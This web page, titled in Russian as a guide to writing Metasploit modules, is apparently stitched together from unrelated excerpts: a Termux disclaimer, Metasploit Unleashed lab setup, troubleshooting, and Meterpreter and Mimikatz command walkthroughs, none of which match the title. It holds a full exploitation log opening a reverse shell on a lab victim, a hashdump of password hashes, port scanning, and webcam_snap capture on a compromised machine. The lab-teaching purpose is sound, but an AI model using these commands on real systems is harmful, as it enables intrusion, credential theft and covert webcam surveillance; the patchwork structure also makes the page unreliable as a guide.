Кодинг для пентестера. разрабатываем модули для metasploit

Disclaimer

Termux developers do not provide any assistance with hacking and related activity
including the configuration and usage of related utilities. No matter whether you
have permission to do so or not, whether you are doing so for education, pranking,
etc.

If you are interested in hacking, it’s expected that you are experienced user. We are
not helping script kiddies.

Phishing, carding and other activity strongly tied with fraud and such that cannot be
treated as anything other than crime is strongly discouraged. Such activity is not
ethical hacking or pentesting and there no place for it in our community.

Troubleshooting

Cannot click in VNC viewer

If you selected VNC viewer as a payload, but are unable to click or do any actions, that means you forgot to set the variable to false. To fix this problem, re-run the exploit with the variable set to :

msf > set ViewOnly false

cannot load such file — robots (LoadError)

If you get an error like this:

~/metasploit-framework/lib/metasploit/framework.rb:19:in `require': cannot load such file -- robots (LoadError)
    from ~/metasploit-framework/lib/metasploit/framework.rb:19:in `<top (required)>'
    from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'
    from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'
    from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'
    from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'
    from ~/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `const_get'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `block in constantize'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `each'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `constantize'
    from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/core_ext/string/inflections.rb:54:in `constantize'
    from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'
    from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'
    from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'
    from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'
    from ./msfconsole:48:in `<main>'
$ ls -l /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib
total 4
-rw-r----- 1 root root 3174 Oct 19 16:47 robots.rb

To fix this, simply change the permission to be world-readable:

# chmod o+r /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib/robots.rb

db_connect fails silently

If upon running you see no output, but later getting a message like this:

 Database not connected or cache not built, using slow search

that probably means that the service is not running.

Metasploit Unleashed Software Requirements

Before jumping in to the Metasploit Framework, we will need to have both an attacking machine (Kali Linux) and a victim machine (metasploitable 2) as well as a hypervisor to run both in a safe and secluded network environment.

Hypervisor

Our recommended hypervisor for the best out-of-the-box compatibility with Kali and metasploitable is VMware Player. While VMware Player is “free”, you will have to register in order to download it, and the virtualization applications and appliances are well worth the registration if you do not already have an account. You may also use VMware Workstation or VMware Fusion but neither of these is free.

There are also other options available when it comes to which hypervisor you would like to use. In addition to VMware, two other commonly used hypervisors are VirtualBox and KVM but they are not covered here. Instructions for installing Kali Linux can be found on the Kali Training site.

Kali Linux

Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution that will be used throughout this course. Kali Linux comes with Metasploit pre-installed along with numerous other security tools that you can try out against your victim machine. You can download the latest version of Kali at:

http://www.kali.org/downloads/

Once you have downloaded Kali, you can update Metasploit to the latest version in the repos by running apt update && apt upgrade in a terminal.

Metasploitable

One of the problems you encounter when learning how to use an exploitation framework is trying to find and configure targets to scan and attack. Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called ‘Metasploitable’.

Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. The VM will run on any recent VMware products and other visualization technologies such as VirtualBox. You can download the image file of Metasploitable 2 from SourceForge.

Never expose Metasploitable to an untrusted network, use NAT or Host-only mode!

Once you have downloaded the Metasploitable VM, extract the zip file, open up the .vmx file using your VMware product of choice, and power it on. After a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.

The Metasploitable virtual machine

For more information on the VM configuration, there is a Metasploitable 2 Exploitability Guide on the Rapid7 website  but beware…there are spoilers in it.

Windows

Microsoft has made a number of virtual machines available that can be downloaded to test Microsoft Edge and different versions of Internet Explorer. We will be able to use these VMs when working with some of the exploits and tools available in Metasploit. You can download the VMs from the following URL:

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Once you have met the above system requirements, you should have no trouble running any tutorials from the Metasploit Unleashed course.

Loot

Once you’ve compromised a system (or three), one of the objective may be to retrieve hash dumps. From either a Windows or *nix system. In the event of a successful hash dump, this information will be stored in our database. We can view this dumps using the loot command. As with almost every command, adding the -h switch will display a little more information.

msf > loot -h
Usage: loot
 Info: loot   
  Add: loot -f  -i  -a  
  Del: loot -d 

  -a,--add          Add loot to the list of addresses, instead of listing
  -d,--delete       Delete *all* loot matching host and type
  -f,--file         File with contents of the loot to add
  -i,--info         Info of the loot to add
  -t <type1,type2>  Search for a list of types
  -h,--help         Show this help information
  -S,--search       Search string to filter by

Here’s an example of how one would populate the database with some loot.

msf  exploit(usermap_script) > exploit

 Started reverse double handler
 Accepted the first client connection...
 Accepted the second client connection...
 Command: echo 4uGPYOrars5OojdL;
 Writing to socket A
 Writing to socket B
 Reading from sockets...
 Reading from socket B
 B: "4uGPYOrars5OojdL\r\n"
 Matching...
 A is input...
 Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:55138) at 2012-06-27 19:38:54 -0400

^Z
Background session 1? [y/N]  y

msf  exploit(usermap_script) > use post/linux/gather/hashdump
msf  post(hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf  post(hashdump) > sessions -l

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  1   shell unix               172.16.194.163:4444 -> 172.16.194.172:55138 (172.16.194.172)

msf  post(hashdump) > run

 root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
 sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
 klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
 msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
 postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
 user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
 service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
 Unshadowed Password File: /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
 Post module execution completed



msf  post(hashdump) > loot

Loot
====

host            service  type          name                   content     info                            path
----            -------  ----          ----                   -------     ----                            ----
172.16.194.172           linux.hashes  unshadowed_passwd.pwd  text/plain  Linux Unshadowed Password File  /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
172.16.194.172           linux.passwd  passwd.tx              text/plain  Linux Passwd File               /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.passwd_953644.txt
172.16.194.172           linux.shadow  shadow.tx              text/plain  Linux Password Shadow File      /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.shadow_492948.txt

Setting up Modules

Another interesting feature available to us, is the ability to search all our entries for something specific. Imagine if we wished to find only the Linux based machines from our scan. For this we’d use the -S option. This option can be combined with our previous example and help fine tune our results.

msf > hosts -c address,os_flavor -S Linux

Hosts
=====

address         os_flavor
-------         ---------
172.16.194.172  Ubuntu

msf >

Using the output of our previous example, we’ll feed that into the ‘tcp’ scan auxiliary module.

msf  auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   FILTER                        no        The filter string for capturing traffic
   INTERFACE                     no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   SNAPLEN      65535            yes       The number of bytes to capture
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

We can see by default, nothing is set in ‘RHOSTS’, we’ll add the -R switch to the hosts command and run the module. Hopefully it will run and scan our target without any problems.

msf  auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R

Hosts
=====

address         os_flavor
-------         ---------
172.16.194.172  Ubuntu

RHOSTS => 172.16.194.172

msf  auxiliary(tcp) > run

 172.16.194.172:25 - TCP OPEN
 172.16.194.172:23 - TCP OPEN
 172.16.194.172:22 - TCP OPEN
 172.16.194.172:21 - TCP OPEN
 172.16.194.172:53 - TCP OPEN
 172.16.194.172:80 - TCP OPEN

...snip...

 172.16.194.172:5432 - TCP OPEN
 172.16.194.172:5900 - TCP OPEN
 172.16.194.172:6000 - TCP OPEN
 172.16.194.172:6667 - TCP OPEN
 172.16.194.172:6697 - TCP OPEN
 172.16.194.172:8009 - TCP OPEN
 172.16.194.172:8180 - TCP OPEN
 172.16.194.172:8787 - TCP OPEN
 Scanned 1 of 1 hosts (100% complete)
 Auxiliary module execution completed

Of course this also works if our results contain more than one address.

msf  auxiliary(tcp) > hosts -R

Hosts
=====

address         mac                name  os_name            os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------            ---------  -----  -------  ----  --------
172.16.194.134  00:0C:29:68:51:BB        Microsoft Windows  XP                server         
172.16.194.172  00:0C:29:D1:62:80        Linux              Ubuntu            server         

RHOSTS => 172.16.194.134 172.16.194.172

msf  auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting                Required  Description
   ----         ---------------                --------  -----------
   CONCURRENCY  10                             yes       The number of concurrent ports to check per host
   FILTER                                      no        The filter string for capturing traffic
   INTERFACE                                   no        The name of the interface
   PCAPFILE                                    no        The name of the PCAP capture file to process
   PORTS        1-10000                        yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       172.16.194.134 172.16.194.172  yes       The target address range or CIDR identifier
   SNAPLEN      65535                          yes       The number of bytes to capture
   THREADS      1                              yes       The number of concurrent threads
   TIMEOUT      1000                           yes       The socket connect timeout in milliseconds

You can see how useful this may be if our database contained hundreds of entries. We could search for Windows machines only, then set the RHOSTS option for the smb_version auxiliary module very quickly. The set RHOSTS switch is available in almost all of the commands that interact with the database.

Never Lose at Minesweeper Again!

Mimikatz also includes a lot of novelty features. One of our favourites is a module that can read the location of mines in the classic Windows Minesweeper game, straight from memory!

meterpreter > mimikatz_command -f winmine::infos
Mines           : 99
Dimension       : 16 lignes x 30 colonnes
Champ           : 

         . . . . . . * . * 1   1 * 1           1 * . . . . . . * . *
         . . * . . . . . . 1   1 1 1       1 1 2 . * . * * . * * . .
         . * . . . . . * . 1         1 1 1 1 * . . . * . . * . . . .
         . . . . . * . * * 2 1     1 2 * . . . * * . . * . . . . * .
         . . * . . * . . . * 1     1 * . * . . . . . . . * . * . . .
         . * * . . . . . . . 2 1 1 1 . * . . . . * . . * . . . . . .
         . . . . . . . . . . . * . . . . . * . . . . . * * . . . . .
         . . . * . * . . . . . * . * . . . . * . . . . * . . . . . .
         . . . . . * * . * . * . * . * * . * * * . . . . . . . . * .
         * * . * . . . 3 1 2 1 2 1 . . * . . * . . * . . * . . . . .
         . . . . * * * 1         1 . . * * . . . * . . . . . . * . *
         . . * * * . 3 1     1 1 2 * 2 2 2 . * . . . . . . * . . . .
         . . . . . * 1   1 1 2 * . 1 1   1 . . . . * . * * * . . . .
         . . . . . . 1   1 * . . . 1     1 * . . . * . . . . . * . .
         . . . . . . 1 1 2 . . . * 1     1 1 1 1 * * . * . . . . * .
         . * . . . . . * . . . * . 1           1 . * . . . . . . . *

Monitor mode

Wi-Fi monitor mode allows you to intercept raw packets transmitted over wireless channel
without being associated with access point. Primarily used by tools like Aircrack-NG, Reaver,
etc.

Here will be shown few tips on getting monitor mode on your device. However, make sure that
following conditions apply:

  • You are experienced user and is familiar with use of desktop Linux distribution.
  • You understand the details on how Android OS kernel is build & flashed on device.
  • You have kernel source code and default configuration file applicable for your device.
  • You have USB OTG adapter and Wi-Fi USB stick.
  • Your device is rooted.
  • You understand that this is not a kernel compilation guide.


Configuring USB WLAN drivers.

You may also check whether Nethunter kernel builds are available for your device — they have
all necessary drivers enabled and probably are pre-compiled.

Configuring custom kernel


Enable monitor mode interface.

Use «make menuconfig» to launch the text-based interface for kernel configuration.

You want these 2 things:

1. CONFIG_MAC80211 — Generic IEEE 802.11 Networking Stack, available in Networking support → Wireless.

2. A driver for USB Wi-Fi stick, for example CONFIG_RT2800USB. They are available at Device Drivers → Network device support → Wireless LAN.

Acquiring monitor mode on device


Running command «airodump-ng mon0» (SSIDs/MACs are censored).

You will need an utility «iw» to be installed which lately will be used to modify Wi-Fi module
configuration:

pkg upgrade
pkg install root-repo
pkg install iw

Plug in the Wi-Fi USB stick and execute next command:

iw phy phy1 interface add mon0 type monitor

There shouldn’t be any error if kernel is properly configured and drivers support monitor mode.
To check whether monitor mode is active, use .

resource

The resource command will execute Meterpreter instructions located inside a text file. Containing one entry per line, resource will execute each line in sequence. This can help automate repetitive actions performed by a user.

By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine).

meterpreter > resource 
Usage: resource path1 path2Run the commands stored in the supplied files.
meterpreter >

ARGUMENTS:

path1:		The location of the file containing the commands to run.
Path2Run:	The location where to run the commands found inside the file

Example usage
Our file used by resource:

root@kali:~# cat resource.txt
ls
background
root@kali:~#

Running resource command:

meterpreter> > resource resource.txt
 Reading /root/resource.txt
 Running ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2012-02-29 16:41:29 -0500  .
40777/rwxrwxrwx   0       dir   2012-02-02 12:24:40 -0500  ..
100666/rw-rw-rw-  606     fil   2012-02-15 17:37:48 -0500  IDA Pro Free.lnk
100777/rwxrwxrwx  681984  fil   2012-02-02 15:09:18 -0500  Sc303.exe
100666/rw-rw-rw-  608     fil   2012-02-28 19:18:34 -0500  Shortcut to Ability Server.lnk
100666/rw-rw-rw-  522     fil   2012-02-02 12:33:38 -0500  XAMPP Control Panel.lnk

 Running background

 Backgrounding session 1...
msf  exploit(handler) >

webcam_snap

The webcam_snap’ command grabs a picture from a connected web cam on the target system, and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename.

meterpreter > webcam_snap -h
Usage: webcam_snap 
Grab a frame from the specified webcam.

OPTIONS:

    -h      Help Banner
    -i   The index of the webcam to use (Default: 1)
    -p   The JPEG image path (Default: 'gnFjTnzi.jpeg')
    -q   The JPEG image quality (Default: '50')
    -v   Automatically view the JPEG image (Default: 'true')

meterpreter >

OPTIONS:

-h:	Displays the help information for the command
-i opt:	If more then 1 web cam is connected, use this option to select the device to capture the
        image from
-p opt:	Change path and filename of the image to be saved
-q opt:	The imagine quality, 50 being the default/medium setting, 100 being best quality
-v opt:	By default the value is true, which opens the image after capture.

Example usage:

meterpreter > webcam_snap -i 1 -v false
 Starting...
 Got frame
 Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
meterpreter >

Using webcam_snap Meterpreter plugin | Metasploit Unleashed

connect

There is a miniature Netcat clone built into the msfconsole that supports SSL, proxies, pivoting, and file transfers. By issuing the connect command with an IP address and port number, you can connect to a remote host from within msfconsole the same as you would with Netcat or Telnet.

msf > connect 192.168.1.1 23
 Connected to 192.168.1.1:23
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)
DD-WRT login:

You can see all the additional options by issuing the -h parameter.

msf > connect -h
Usage: connect   

Communicate with a host, similar to interacting via netcat, taking advantage of
any configured session pivoting.

OPTIONS:

    -C        Try to use CRLF for EOL sequence.
    -P <opt>  Specify source port.
    -S <opt>  Specify source address.
    -c <opt>  Specify which Comm to use.
    -h        Help banner.
    -i <opt>  Send the contents of a file.
    -p <opt>  List of proxies to use.
    -s        Connect with SSL.
    -u        Switch to a UDP socket.
    -w <opt>  Specify connect timeout.
    -z        Just try to connect, then return.

msf >
Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *